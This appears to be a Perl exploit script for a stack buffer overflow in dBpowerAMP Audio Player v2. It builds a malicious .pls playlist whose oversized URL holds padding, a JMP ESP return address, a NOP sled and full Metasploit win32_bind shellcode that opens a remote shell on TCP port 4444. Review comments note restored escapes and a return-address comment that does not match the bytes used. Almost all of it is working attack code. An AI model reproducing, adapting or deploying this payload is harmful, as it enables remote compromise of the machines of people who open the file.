
dbpoweramp2-overflow.txt

Posted on 29 January 2009

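#!/usr/bin/perl
# dBpowerAMP Audio Player v2 (.pls file) local buffer-overflow exploit
# Exploited by AlpHaNiX -- from NullArea.Net -- thanks to Stack for the PoC.
#
# Writes a one-entry .pls playlist whose File1= URL is oversized so that
# the player overruns a stack buffer when it parses it.  Layout of the URL:
#
#   600 x 0x41   padding up to the saved return address
#     4 bytes    return address (JMP ESP), little-endian
#    52 x 0x90   NOP sled
#   344 bytes    metasploit win32_bind payload (LPORT=4444, EXITFUNC=seh,
#                PexFnstenvSub-encoded)
#
# NOTE(review): the listing this was recovered from had every backslash
# stripped ("x41" instead of "\x41"), which turned the padding, NOP sled and
# shellcode into plain ASCII text (wrong lengths, no machine code) and
# collapsed the .pls line breaks.  The escapes and the newlines are
# restored here so the file matches the layout documented above.
#
# PoC for lab use only: the output crashes the player and, only if the
# return address matches the target build, binds a shell on TCP/4444.
use strict;
use warnings;

use constant DEFAULT_OUTPUT => 'alp1x.pls';

# Return address as written in the file: bytes C7 EB FA 75 = 0x75FAEBC7
# little-endian.
# NOTE(review): the original comment reads "77C80F1A JMP ESP [ntdll v6.0
# vista en ultimate]", which does NOT match these bytes -- confirm the
# JMP ESP address for the exact target DLL before relying on it.
my $RET = "\xC7\xEB\xFA\x75";

# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub
# http://metasploit.com
my $SHELLCODE =
    "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50" .
    "\x80\x56\xea\x83\xeb\xfc\xe2\xf4\xac\xea\xbd\xa7\xb8\x79\xa9\x15" .
    "\xaf\xe0\xdd\x86\x74\xa4\xdd\xaf\x6c\x0b\x2a\xef\x28\x81\xb9\x61" .
    "\x1f\x98\xdd\xb5\x70\x81\xbd\xa3\xdb\xb4\xdd\xeb\xbe\xb1\x96\x73" .
    "\xfc\x04\x96\x9e\x57\x41\x9c\xe7\x51\x42\xbd\x1e\x6b\xd4\x72\xc2" .
    "\x25\x65\xdd\xb5\x74\x81\xbd\x8c\xdb\x8c\x1d\x61\x0f\x9c\x57\x01" .
    "\x53\xac\xdd\x63\x3c\xa4\x4a\x8b\x93\xb1\x8d\x8e\xdb\xc3\x66\x61" .
    "\x10\x8c\xdd\x9a\x4c\x2d\xdd\xaa\x58\xde\x3e\x64\x1e\x8e\xba\xba" .
    "\xaf\x56\x30\xb9\x36\xe8\x65\xd8\x38\xf7\x25\xd8\x0f\xd4\xa9\x3a" .
    "\x38\x4b\xbb\x16\x6b\xd0\xa9\x3c\x0f\x09\xb3\x8c\xd1\x6d\x5e\xe8" .
    "\x05\xea\x54\x15\x80\xe8\x8f\xe3\xa5\x2d\x01\x15\x86\xd3\x05\xb9" .
    "\x03\xd3\x15\xb9\x13\xd3\xa9\x3a\x36\xe8\x47\xb6\x36\xd3\xdf\x0b" .
    "\xc5\xe8\xf2\xf0\x20\x47\x01\x15\x86\xea\x46\xbb\x05\x7f\x86\x82" .
    "\xf4\x2d\x78\x03\x07\x7f\x80\xb9\x05\x7f\x86\x82\xb5\xc9\xd0\xa3" .
    "\x07\x7f\x80\xba\x04\xd4\x03\x15\x80\x13\x3e\x0d\x29\x46\x2f\xbd" .
    "\xaf\x56\x03\x15\x80\xe6\x3c\x8e\x36\xe8\x35\x87\xd9\x65\x3c\xba" .
    "\x09\xa9\x9a\x63\xb7\xea\x12\x63\xb2\xb1\x96\x19\xfa\x7e\x14\xc7" .
    "\xae\xc2\x7a\x79\xdd\xfa\x6e\x41\xfb\x2b\x3e\x98\xae\x33\x40\x15" .
    "\x25\xc4\xa9\x3c\x0b\xd7\x04\xbb\x01\xd1\x3c\xeb\x01\xd1\x03\xbb" .
    "\xaf\x50\x3e\x47\x89\x85\x98\xb9\xaf\x56\x3c\x15\xaf\xb7\xa9\x3a" .
    "\xdb\xd7\xaa\x69\x94\xe4\xa9\x3c\x02\x7f\x86\x82\xa0\x0a\x52\xb5" .
    "\x03\x7f\x80\x15\x80\x80\x56\xea";

# Assemble the overflow string: padding, return address, NOP sled, payload.
# Returns the 1000-byte (600 + 4 + 52 + 344) raw buffer.
sub build_buffer {
    my $padding = "\x41" x 600;
    my $nop_sled = "\x90" x 52;
    return $padding . $RET . $nop_sled . $SHELLCODE;
}

# Wrap the overflow string in a minimal one-entry .pls playlist.
# Takes the raw buffer, returns the playlist text (no trailing newline).
sub build_playlist {
    my ($buffer) = @_;
    return join "\n",
        '[playlist]',
        'NumberOfEntries=1',
        'File1=http://' . $buffer;
}

# Write $content to $path as raw bytes; dies on any I/O failure so a
# truncated payload is never silently left on disk.
sub write_playlist {
    my ($path, $content) = @_;
    open my $fh, '>', $path or die "open $path: $!";
    # Raw mode: the shellcode contains 0x0a and 0x0d bytes, which a text-mode
    # handle on Windows would rewrite and thereby corrupt the payload.
    binmode $fh;
    print {$fh} $content or die "write $path: $!";
    close $fh or die "close $path: $!";
    return;
}

# Entry point: optional first argument overrides the output file name
# (default alp1x.pls, as in the original).
sub main {
    my $output = @ARGV ? $ARGV[0] : DEFAULT_OUTPUT;
    system('cls');    # clears the console on Windows; a no-op failure elsewhere
    print " [+] dBpowerAMP Audio Player v2 ( .pls file) LoCaL BufferOverFlow Exploit\n";
    write_playlist($output, build_playlist(build_buffer()));
    print " [!] File Creation Done !\n";
    return;
}

main() unless caller;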

 
